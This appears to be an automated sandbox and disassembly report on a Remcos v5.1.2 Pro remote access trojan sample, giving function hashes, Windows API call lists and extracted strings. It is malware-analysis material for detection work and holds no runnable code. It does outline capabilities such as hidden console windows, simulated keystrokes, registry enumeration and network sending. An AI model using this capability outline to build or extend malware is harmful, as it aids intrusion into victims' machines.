                                                  • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                  • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                  • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                  • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: SG$86l$C:\Users\user\Desktop\FPPhfkcDCh.exe$`m$xdF
                                                  • API String ID: 0-1769602027
                                                  • Opcode ID: 76fb36a6468107bc6bcf7edae7d85ad02bbabba37b75d9201cd6870646e6a122
                                                  • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                  • Opcode Fuzzy Hash: 76fb36a6468107bc6bcf7edae7d85ad02bbabba37b75d9201cd6870646e6a122
                                                  • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                  • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                  APIs
                                                  • GetCPInfo.KERNEL32(?,?), ref: 00453EAF
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F32
                                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FC5
                                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453FDC
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00454058
                                                  • __freea.LIBCMT ref: 00454083
                                                  • __freea.LIBCMT ref: 0045408F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                  • String ID:
                                                  • API String ID: 201697637-0
                                                  • Opcode ID: 1c79323f55dedcab474402cd530056180fcf6acbc2628831f9fcb1c62bebc053
                                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                  • Opcode Fuzzy Hash: 1c79323f55dedcab474402cd530056180fcf6acbc2628831f9fcb1c62bebc053
                                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                  • _free.LIBCMT ref: 00445515
                                                  • _free.LIBCMT ref: 0044552E
                                                  • _free.LIBCMT ref: 00445560
                                                  • _free.LIBCMT ref: 00445569
                                                  • _free.LIBCMT ref: 00445575
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                  • String ID: C
                                                  • API String ID: 1679612858-1037565863
                                                  • Opcode ID: dc70f5935c4cadc04478971efa28b20dbce750eb1dc69c9fe13c760ed60cdc29
                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                  • Opcode Fuzzy Hash: dc70f5935c4cadc04478971efa28b20dbce750eb1dc69c9fe13c760ed60cdc29
                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tcp$udp
                                                  • API String ID: 0-3725065008
                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                  • String ID: H{l$PkG$NG$NG
                                                  • API String ID: 1649129571-4002699757
                                                  • Opcode ID: 0f64698b943d044e9c44b40061bc22dc02fae1423900d42594b13ca127a5eeee
                                                  • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                  • Opcode Fuzzy Hash: 0f64698b943d044e9c44b40061bc22dc02fae1423900d42594b13ca127a5eeee
                                                  • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                  • String ID: .part
                                                  • API String ID: 1303771098-3499674018
                                                  • Opcode ID: 574ce09f97f532c6649a1055b4b6b44f95d16ded907ae16722569cd649f46737
                                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                  • Opcode Fuzzy Hash: 574ce09f97f532c6649a1055b4b6b44f95d16ded907ae16722569cd649f46737
                                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                  APIs
                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,`m), ref: 00413678
                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                  • String ID: .exe$8SG$`m$http\shell\open\command$program files (x86)\$program files\
                                                  • API String ID: 3286818993-1153738959
                                                  • Opcode ID: 21ce8c3951ea68e9f4768855c246d238a69c4de2a44f28aaa4944944c55ea733
                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                  • Opcode Fuzzy Hash: 21ce8c3951ea68e9f4768855c246d238a69c4de2a44f28aaa4944944c55ea733
                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                  APIs
                                                  • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                  • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$Window$AllocOutputShow
                                                  • String ID: Remcos v$5.1.2 Pro$CONOUT$
                                                  • API String ID: 4067487056-1584637518
                                                  • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                  • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                  • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                  • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                  • __freea.LIBCMT ref: 0044AEB0
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • __freea.LIBCMT ref: 0044AEB9
                                                  • __freea.LIBCMT ref: 0044AEDE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3864826663-0
                                                  • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                  • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                  APIs
                                                  • SendInput.USER32 ref: 00419A25
                                                  • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InputSend$Virtual
                                                  • String ID:
                                                  • API String ID: 1167301434-0
                                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16_free
                                                  • String ID: a/p$am/pm$h{D
                                                  • API String ID: 2936374016-2303565833
                                                  • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                  • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                  APIs
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • _free.LIBCMT ref: 00444E87
                                                  • _free.LIBCMT ref: 00444E9E
                                                  • _free.LIBCMT ref: 00444EBD
                                                  • _free.LIBCMT ref: 00444ED8
                                                  • _free.LIBCMT ref: 00444EEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID: KED
                                                  • API String ID: 3033488037-2133951994
                                                  • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                  • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                  APIs
                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum$InfoQueryValue
                                                  • String ID: [regsplt]$xUG$TG
                                                  • API String ID: 3554306468-1165877943
                                                  • Opcode ID: 6129f07ca8e649aa684d27b9dba7dc75c53e511e8a381502f1a2dc1ed25c8145
                                                  • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                  • Opcode Fuzzy Hash: 6129f07ca8e649aa684d27b9dba7dc75c53e511e8a381502f1a2dc1ed25c8145
                                                  • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                  • __fassign.LIBCMT ref: 0044B4F9
                                                  • __fassign.LIBCMT ref: 0044B514
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
